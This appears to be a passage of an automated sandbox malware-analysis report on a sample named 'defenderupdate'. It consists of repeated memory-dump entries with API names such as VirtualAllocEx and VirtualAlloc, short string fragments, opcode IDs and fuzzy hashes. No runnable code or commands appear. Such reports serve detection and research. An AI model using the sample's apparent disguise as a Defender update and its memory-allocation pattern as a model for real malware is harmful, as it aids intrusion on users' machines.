                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 73c2da1db942a4841792d5c5cb12b0c96f7a2dc65caf29d92eea42a1ebc12aa1
                                                                                                • Instruction ID: 23824ebf3f5167c4c41d44871aac6ee64ce796156f36c86a41a1493cafb3d2af
                                                                                                • Opcode Fuzzy Hash: 73c2da1db942a4841792d5c5cb12b0c96f7a2dc65caf29d92eea42a1ebc12aa1
                                                                                                • Instruction Fuzzy Hash: 751137B29002499FCB10DFAAC844BDEBFF5EF88324F108419E559A7250C775A954CFA4
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06B7CF56
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222652595.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6b70000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 1122e25b11400712555f5b561199187fef7d5d230b28588a3e6368797c78aca8
                                                                                                • Instruction ID: 2cb37fcca873d9101f0b0f2facf7f360eabdcfc7f6811fb82a89fc8d629e60f0
                                                                                                • Opcode Fuzzy Hash: 1122e25b11400712555f5b561199187fef7d5d230b28588a3e6368797c78aca8
                                                                                                • Instruction Fuzzy Hash: 3F1147B29002498FCB10DFA9C945ADEBFF5EB48310F10841AE569A7250C7359554CF94
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 018A8FFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 4367fd0d16f7aee63fd7c1d51a792dab319a6d921b2ffa2d5ef09e1184f86f8b
                                                                                                • Instruction ID: 3ad9ec3b772b1341acd239da0accabd0a234aacfc69ac875413abd83db0a1923
                                                                                                • Opcode Fuzzy Hash: 4367fd0d16f7aee63fd7c1d51a792dab319a6d921b2ffa2d5ef09e1184f86f8b
                                                                                                • Instruction Fuzzy Hash: 2511AFB1908385CFDB21DF9AC0047EEBFF4AB05354F54809DD599A7242C3796644CFA5
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 018A8FFD
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 2df27db0002a434fafd9463d480156e1b2aa21a6c5ddd2fe744c7153fe229703
                                                                                                • Instruction ID: 520076e7faafeebcb978cb0a1990b633c77a6cefde352175c52a5dedbec8a4d4
                                                                                                • Opcode Fuzzy Hash: 2df27db0002a434fafd9463d480156e1b2aa21a6c5ddd2fe744c7153fe229703
                                                                                                • Instruction Fuzzy Hash: 24118BB1904389CFDB21DF9AC0047EABFF4AB05314F508099D589A3242C339A644CFA5
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 018AA6DE
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2168095387.00000000018A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018A0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_18a0000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: 615093edc69dd741a1c8d166146ca5b481bb6dee03358f8fd3f6a26bed379036
                                                                                                • Instruction ID: 81ba2960719391bef0ea03c10f6c90bcf6b9b6b9347a381aa665c87b8e79414c
                                                                                                • Opcode Fuzzy Hash: 615093edc69dd741a1c8d166146ca5b481bb6dee03358f8fd3f6a26bed379036
                                                                                                • Instruction Fuzzy Hash: 5911E0B6C002498FDB24CF9AC444ADEFBF4EB88324F11842AD569A7610D379A645CFA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Pl^q
                                                                                                • API String ID: 0-2831078282
                                                                                                • Opcode ID: 66dea8a3cfbae8d082bb5f118a4f093ea4632696dcf1818729416e5e15890b61
                                                                                                • Instruction ID: 1b02dfdc44e5832d19417d6ecf2bb0eb7e4fb15af93ede4073adfe303c8e1d71
                                                                                                • Opcode Fuzzy Hash: 66dea8a3cfbae8d082bb5f118a4f093ea4632696dcf1818729416e5e15890b61
                                                                                                • Instruction Fuzzy Hash: 80911430B002198FDB54EF69C484A6ABBE6FF89710B1540A9E505DF3B5DB71EC42CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 9ea155ac29a4d0de703bd5d9cac2f9b5261586de30a6bdcfce7b5ce83a42f031
                                                                                                • Instruction ID: ff9d5120037eca1534ea1cdde9c02c0e23c3652b2ec7c4c2824f5840a8ad1e54
                                                                                                • Opcode Fuzzy Hash: 9ea155ac29a4d0de703bd5d9cac2f9b5261586de30a6bdcfce7b5ce83a42f031
                                                                                                • Instruction Fuzzy Hash: 8BA10F34A10218DFCB54FFA8D998AAEB7B2FF88300F558159E4066B365DB74EC46CB50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: 560018dc4fee73f34da654f1a4d7253e1c8258f444552c5af27247da3a64ffb4
                                                                                                • Instruction ID: 15b783f3389aa96427ec9666dda4c5dec479102a98bf292643abe91c23c4449b
                                                                                                • Opcode Fuzzy Hash: 560018dc4fee73f34da654f1a4d7253e1c8258f444552c5af27247da3a64ffb4
                                                                                                • Instruction Fuzzy Hash: 71719B30B006148FCB94FF68D594AAEB3B2EF89700F518169E0129B3A4CF74AD46CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: 7c619bf21d1d4e572287b6a87d3efd2f513be96044e699d194f6e52f64cb4dba
                                                                                                • Instruction ID: 7b7705c46bc68cee7dfbe26a3c0f360c4bc542d385eca92bcc284b9d9d21932a
                                                                                                • Opcode Fuzzy Hash: 7c619bf21d1d4e572287b6a87d3efd2f513be96044e699d194f6e52f64cb4dba
                                                                                                • Instruction Fuzzy Hash: 39519D357001158FCB05EF69D8549AEBBE6FF89310B25806AE905DF362CB31EC06CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (bq
                                                                                                • API String ID: 0-149360118
                                                                                                • Opcode ID: 92e4777a0531f922992fc44ca8c6d5ef81606426872f0776e6217161776ad818
                                                                                                • Instruction ID: 1affd6d2166c2d9589f7dd66e556084d50e21c0c288dc2208d11a7507979f530
                                                                                                • Opcode Fuzzy Hash: 92e4777a0531f922992fc44ca8c6d5ef81606426872f0776e6217161776ad818
                                                                                                • Instruction Fuzzy Hash: B9519D76704244AFCB56AF69D814D5A7FB6FF8931071680EAE205CF2B2CA32DC11DB51
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: 4f6868118f1825ac49c60b3686d61c766d15391e2e8b3c158c7b6b1cc73f3009
                                                                                                • Instruction ID: 55ab5498c5af7dd88cfec601dd82c69a7b6005a8db613b3839a943a983aca610
                                                                                                • Opcode Fuzzy Hash: 4f6868118f1825ac49c60b3686d61c766d15391e2e8b3c158c7b6b1cc73f3009
                                                                                                • Instruction Fuzzy Hash: DE416034B106148FCB95BB68D894AAEB7B7EFC9710F518429E413AB394CF749C06CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q
                                                                                                • API String ID: 0-1614139903
                                                                                                • Opcode ID: cd4c5ab6b93f5699986953f851ed2e06ac64f990a7560ed3a02c585b6fecf540
                                                                                                • Instruction ID: 5b4f9fdc01498f3a0a8b9041bbd71fc6c5540294da29cc2f07c15fe915fb5282
                                                                                                • Opcode Fuzzy Hash: cd4c5ab6b93f5699986953f851ed2e06ac64f990a7560ed3a02c585b6fecf540
                                                                                                • Instruction Fuzzy Hash: 4C31A1357001049FDB15AF64D954A9ABFB7EF88310B0540A9E5069B376CA32EC56CB90
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p<^q
                                                                                                • API String ID: 0-1680888324
                                                                                                • Opcode ID: b25ad7ccf98bafe210d9f44e39595e4ce5b83939cc60cd5477a2f7764c228f90
                                                                                                • Instruction ID: 98153fbb268d21f9066f246441c49d85ae40ce7ec76fb9c729e916b4430f0984
                                                                                                • Opcode Fuzzy Hash: b25ad7ccf98bafe210d9f44e39595e4ce5b83939cc60cd5477a2f7764c228f90
                                                                                                • Instruction Fuzzy Hash: 1F21CF317001449FDF52EF6AC844AAA3BEAFF89701F154095F819CB2B1CA72DC51CB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: p<^q
                                                                                                • API String ID: 0-1680888324
                                                                                                • Opcode ID: c7e0c8a830fdd127694daa4c28f27c8d2fe8ac8937857896bc2fc7914fde2564
                                                                                                • Instruction ID: 6643ea591965dae52011ecc6b485aa2a37be1b490cd1466e84fe8dd5f38bcfcd
                                                                                                • Opcode Fuzzy Hash: c7e0c8a830fdd127694daa4c28f27c8d2fe8ac8937857896bc2fc7914fde2564
                                                                                                • Instruction Fuzzy Hash: B4219D317001549FDF42EF6AC840AAA7BEABF89701F0580A5FC19CB3A1CA72DC51CB60
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ,bq
                                                                                                • API String ID: 0-2474004448
                                                                                                • Opcode ID: e843a605626d7fd8d6e271fd86a0dc544e16ab7bad50ac5f9fea38509b319a08
                                                                                                • Instruction ID: 96ab59b06b126710d8225fd677e8be4dbb0bce00363d83cb4eb4e9ac02942fd0
                                                                                                • Opcode Fuzzy Hash: e843a605626d7fd8d6e271fd86a0dc544e16ab7bad50ac5f9fea38509b319a08
                                                                                                • Instruction Fuzzy Hash: 1D11BB34B001158FDB04EFA9C9549AEBBB6AF89300F2580A6E901DF362C730ED01CBA1
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 06C4F093
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222847887.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6c40000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 2210d862169d7357c90fbe540a4a45c03021340a5670f20b2c62510a4e8b473a
                                                                                                • Instruction ID: a656a17e56246edaad34238e8a4d9ed3ded28cb0706eb02b6671770456c67277
                                                                                                • Opcode Fuzzy Hash: 2210d862169d7357c90fbe540a4a45c03021340a5670f20b2c62510a4e8b473a
                                                                                                • Instruction Fuzzy Hash: C21137B19002498FCB20DFAAC844BDEFFF5EB88324F10841AD459A7250CB75A544CFA4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: Q
                                                                                                • API String ID: 0-3463352047
                                                                                                • Opcode ID: 460302219425ac58f0acfd2daa609b33d16314dacb66508eb1c47828d8feb775
                                                                                                • Instruction ID: 3a539e420577e8be7fe7d677e9310a8bcd800ba574e49d3992b83aa7a8063443
                                                                                                • Opcode Fuzzy Hash: 460302219425ac58f0acfd2daa609b33d16314dacb66508eb1c47828d8feb775
                                                                                                • Instruction Fuzzy Hash: A5F0B270D21318CFDB85EFA8D888B9DB7F1BF05309F2014AAE409AB250D7706A41CF50
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: C
                                                                                                • API String ID: 0-1037565863
                                                                                                • Opcode ID: 18d4bd21d85b7a3914599c7015298d1cf9c7ec06a8a11da7a3c72aca11b75e67
                                                                                                • Instruction ID: 29a151cd16ddce9047376281b96453b7c5bbaaee48887ff19d2e2a2f531446e3
                                                                                                • Opcode Fuzzy Hash: 18d4bd21d85b7a3914599c7015298d1cf9c7ec06a8a11da7a3c72aca11b75e67
                                                                                                • Instruction Fuzzy Hash: 71E09274811228DFDF9ADF64C894B9DBBB5FB45308F601199D40872241C7745B85CE65
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c6d3a96e8e8fa0df672e4ef9a77d5704beddfadd4d13552b581e66f3d1b614c6
                                                                                                • Instruction ID: 25fd3de978afe4e186d92a6cdc916492cc39bc7a311dde15e807b766b9958efa
                                                                                                • Opcode Fuzzy Hash: c6d3a96e8e8fa0df672e4ef9a77d5704beddfadd4d13552b581e66f3d1b614c6
                                                                                                • Instruction Fuzzy Hash: B612FB34A002188FDB54FF64C994AADB7B2BF89300F5185A8D54AAB395DF34ED86CF50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: ea5b3dd301e6935827ebe05e2738ff453c90bb0c06dfabadc9b6299e56c1cc62
                                                                                                • Instruction ID: e70d42e20f9767b74db1c4d71eccf4cc6642bae53568c22256e930527ee6851a
                                                                                                • Opcode Fuzzy Hash: ea5b3dd301e6935827ebe05e2738ff453c90bb0c06dfabadc9b6299e56c1cc62
                                                                                                • Instruction Fuzzy Hash: F891AE35B012049FDB45EFA4E958AADBBF2FF88311F148069E6019B391DB35DD4ACB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a6c7d76bc2de2db3f306bb09350c60e2e7788f21ad2e11124652ca756b0479dc
                                                                                                • Instruction ID: 945d84e57a1c0f7b29c98dcb0198f37f1b870ff4f812085d8696f1d3aa5345e5
                                                                                                • Opcode Fuzzy Hash: a6c7d76bc2de2db3f306bb09350c60e2e7788f21ad2e11124652ca756b0479dc
                                                                                                • Instruction Fuzzy Hash: 3DA10B34A002188FDB54FF24C994BA9B7B2BF89310F5185A8E54AAB395DF74ED85CF40
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 844579a5e860ba74ba92a9897a12aa6f8eb506574a9bee5f03eeae5fd763d220
                                                                                                • Instruction ID: 4619cecb36971e2c483c5f4994b4676b436a1d2e7f3be3978d4e72ce154a331d
                                                                                                • Opcode Fuzzy Hash: 844579a5e860ba74ba92a9897a12aa6f8eb506574a9bee5f03eeae5fd763d220
                                                                                                • Instruction Fuzzy Hash: F5A14A70E002298FEF51EFA5D894AEDBBB1FF48B04F148115E811AB295DB399D46CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9e577b4c950776c4b85540926fd1d104dd085cacea034f672ceec79e3b2e94cd
                                                                                                • Instruction ID: c86b862301e33be5c240aa08629f885755d997a515544b425df0bc6037cc2b2e
                                                                                                • Opcode Fuzzy Hash: 9e577b4c950776c4b85540926fd1d104dd085cacea034f672ceec79e3b2e94cd
                                                                                                • Instruction Fuzzy Hash: 49814B34B10215DFDB54FF68D894AAEBBB6BF89710F1540A9E5069B3A1DB34DC02CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a8e41f5471362182056d1f13fd07eebd10cb44b531949098dc03e59a0057723f
                                                                                                • Instruction ID: e47ff5eb389032a4f3e41d694286f0b306f2234818f2db07c168c788cc206988
                                                                                                • Opcode Fuzzy Hash: a8e41f5471362182056d1f13fd07eebd10cb44b531949098dc03e59a0057723f
                                                                                                • Instruction Fuzzy Hash: 31811575E406188FCB54EF69C58899EB7F5FF88314B1580A9E8169B361DB30EC42CF90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: dfa7b5193f1ac25b399ceb38fbba699dc3ef67df6782070ebbf59ffd96b1eecf
                                                                                                • Instruction ID: 6cbbf9cfc1d2e7b93902a94d6b59cc84368919bb5e2d3e786c11375e1e3e1dcb
                                                                                                • Opcode Fuzzy Hash: dfa7b5193f1ac25b399ceb38fbba699dc3ef67df6782070ebbf59ffd96b1eecf
                                                                                                • Instruction Fuzzy Hash: 9D612C34B10214DFDB54EF68D894AAEBBB6FF89710F1541A9E5069B361DB30EC42CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bacaab86fae74decd7cbb8a1d1649e70b7b2f254ae8c8b0c2b68ef7fab3aa4a5
                                                                                                • Instruction ID: 7a3a68789a663b9f9e22581dddbc5f45738328ffc6d9d40556c10ec82046fe4a
                                                                                                • Opcode Fuzzy Hash: bacaab86fae74decd7cbb8a1d1649e70b7b2f254ae8c8b0c2b68ef7fab3aa4a5
                                                                                                • Instruction Fuzzy Hash: 6C513C34B006099FDB14AF64E498AAEBBB6FFC8711F008119E5069B364DF749D4BCB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 2fbcabdc6329dad3ac21b3a3d4e1a2ed7b219930031a8fea058ca4bfcbf4ed1d
                                                                                                • Instruction ID: 557b036fb9bd7eeeeede2605390dcb86778a7f0da80daa736cca5dc882fda6fb
                                                                                                • Opcode Fuzzy Hash: 2fbcabdc6329dad3ac21b3a3d4e1a2ed7b219930031a8fea058ca4bfcbf4ed1d
                                                                                                • Instruction Fuzzy Hash: 15419F307002059FD769BB25D994B2ABBA3EF85304F14856CD5464F6E1CB76EC86CB90
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9cd3a5d4f82b6071de9b04e9f76f08a924357397daa0a7b32153060bcdcedfab
                                                                                                • Instruction ID: d40cc858597cd0dcbff9a287deb8e8ad8c782043cfb7c71fc2875e6e61390d1c
                                                                                                • Opcode Fuzzy Hash: 9cd3a5d4f82b6071de9b04e9f76f08a924357397daa0a7b32153060bcdcedfab
                                                                                                • Instruction Fuzzy Hash: 5551D270E11209DFDB58DFB9D594A9DBBF2BF89304F24806AE409AB360DB319945CF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a90000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f13f3d5aff4820693475e1ace0174c85942e27214ee1a31d43bb62c97d1e84df
                                                                                                • Instruction ID: 28aff8f0b6ffc78d6c812e562dff5ca79503129ec2289f3f03d75e0eeb9e380e
                                                                                                • Opcode Fuzzy Hash: f13f3d5aff4820693475e1ace0174c85942e27214ee1a31d43bb62c97d1e84df
                                                                                                • Instruction Fuzzy Hash: 2F41D574E11208DFDB58DFB9D954ADDBBF2BF89304F248069E409AB260DB309941CF60
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 216fca425f0380d76358fa837df1a15518afda5fade47850d951f0594c6d1439
                                                                                                • Instruction ID: 24d72939227aebb4fe771dac66f55cb7100a3f6f8466bb5fccb1dbd2598cf79e
                                                                                                • Opcode Fuzzy Hash: 216fca425f0380d76358fa837df1a15518afda5fade47850d951f0594c6d1439
                                                                                                • Instruction Fuzzy Hash: 2D41BE71F00215CFEB50EFA9D845AAEBBB1FF88344F00806AD556EB2A0D7359949CB91
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 1994e40f01cc6fc0629c487b8299bdbbad5079c13f1cc1335cf3e063b6760c5b
                                                                                                • Instruction ID: 9eeac147f4f09634e15cd65de98f7d8673b0eda85990d3df6d0f13fb9c978ca5
                                                                                                • Opcode Fuzzy Hash: 1994e40f01cc6fc0629c487b8299bdbbad5079c13f1cc1335cf3e063b6760c5b
                                                                                                • Instruction Fuzzy Hash: 03310836A101059FCB45EF58D888EA9BBB2FF48720F0680A8E5099F372D731EC55DB50
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222056213.0000000006A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A80000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_8_2_6a80000_defenderupdate.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 3818bce4ba370bf27312311a83c8711698b538449c02fc42f8fc46a80fcdda89
                                                                                                • Instruction ID: 21c8795f5d219da9dc811cfa489ebfa4eabb772e3d32b22a70ec1d5fbbae9294
                                                                                                • Opcode Fuzzy Hash: 3818bce4ba370bf27312311a83c8711698b538449c02fc42f8fc46a80fcdda89
                                                                                                • Instruction Fuzzy Hash: C5311935B00119DFDB54EF64D894AEEB7B6FF88310F108069E815BB294CB759D45CBA0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000008.00000002.2222199984.0000000006A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A90000, based on PE: false
